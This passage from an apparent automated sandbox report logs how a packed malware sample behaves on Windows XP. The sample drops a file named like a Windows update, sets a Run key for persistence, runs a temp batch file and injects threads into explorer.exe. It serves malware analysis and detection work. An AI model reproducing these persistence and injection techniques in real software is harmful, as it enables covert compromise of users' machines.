Base Address: [0x773D0000 ], Size: [0x00103000 ]
[=============================================================================]
Run-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\Apphelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.DLL ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
[=============================================================================]
SigBuster Output
[=============================================================================]
UPX All_Versions SN:1634
[=============================================================================]
2.a) bc9deebcb0.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ AppData ], New Value: [ C:\Documents and Settings\Administrator\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ],
Value Name: [ KB00983751.exe ], New Value: [ "C:\Documents and Settings\Administrator\Application Data\KB00983751.exe" ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\HTTP ],
Value Name: [ Source Filter ], Value: [ {E436EBB6-524F-11CE-9F53-0020AF0BA770} ], 2 times
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\WPA\MediaCenter ],
Value Name: [ Installed ], Value: [ 0 ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ AuthenticodeEnabled ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemSize ], Value: [ 779 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemSize ], Value: [ 517 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemSize ], Value: [ 918 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemSize ], Value: [ 229 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemSize ], Value: [ 370 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ AppData ], Value: [ %USERPROFILE%\Application Data ], 1 time
[=============================================================================]
2.b) bc9deebcb0.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp ]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\Apphelp.dll ]
File Name: [ C:\WINDOWS\system32\MSCTF.dll ]
File Name: [ C:\WINDOWS\system32\MSIMG32.DLL ]
File Name: [ C:\WINDOWS\system32\PSAPI.DLL ]
File Name: [ C:\WINDOWS\system32\SHELL32.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\cmd.exe ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\WINDOWS\system32\imm32.dll ]
File Name: [ C:\WINDOWS\system32\rtutils.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
File Name: [ C:\bc9deebcb0.exe ]
[=============================================================================]
2.c) bc9deebcb0.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Processes Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Executable: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ], Command Line: [ ]
Executable: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ], Command Line: [ ]
Executable: [ C:\WINDOWS\system32\cmd.exe ], Command Line: [ ]
Executable: [ ], Command Line: [ "C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT" ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Affected Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
[#############################################################################]
3. KB00983751.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Started by bc9deebcb0.exe
Filename: KB00983751.exe
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
SHA-1: b3a32d512c1e28a269e7947da4807cd39bbb6ef3
File Size: 73216 Bytes
Command Line: "C:\Documents and Settings\Administrator\Application Data\KB00983751.exe"
Process-status
at analysis end: dead
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.DLL ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\MSVCRT.DLL ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\PSAPI.DLL ],
Base Address: [0x76BF0000 ], Size: [0x0000B000 ]
Module Name: [ C:\WINDOWS\system32\SECUR32.DLL ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\TAPI32.DLL ],
Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
Base Address: [0x76E80000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
[=============================================================================]
Run-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
[=============================================================================]
SigBuster Output
[=============================================================================]
UPX All_Versions SN:1634
[=============================================================================]
3.a) KB00983751.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\HTTP ],
Value Name: [ Source Filter ], Value: [ {E436EBB6-524F-11CE-9F53-0020AF0BA770} ], 2 times
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
[=============================================================================]
3.b) KB00983751.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 7 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSCTF.dll ]
File Name: [ C:\WINDOWS\system32\MSIMG32.DLL ]
File Name: [ C:\WINDOWS\system32\PSAPI.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\imm32.dll ]
File Name: [ C:\WINDOWS\system32\rtutils.dll ]
[=============================================================================]
3.c) KB00983751.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\WINDOWS\explorer.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\WINDOWS\explorer.exe ]
[#############################################################################]
4. cmd.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Started by bc9deebcb0.exe
Filename: cmd.exe
MD5: 6d778e0f95447e6546553eeea709d03c
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
File Size: 389120 Bytes
Command Line: "C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT"
Process-status
at analysis end: dead
Exit Code: 1
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
[=============================================================================]
4.a) cmd.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\WPA\MediaCenter ],
Value Name: [ Installed ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000000204000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000001100000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000550000001e000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000000200000032000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000120000006001000016000000610100001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
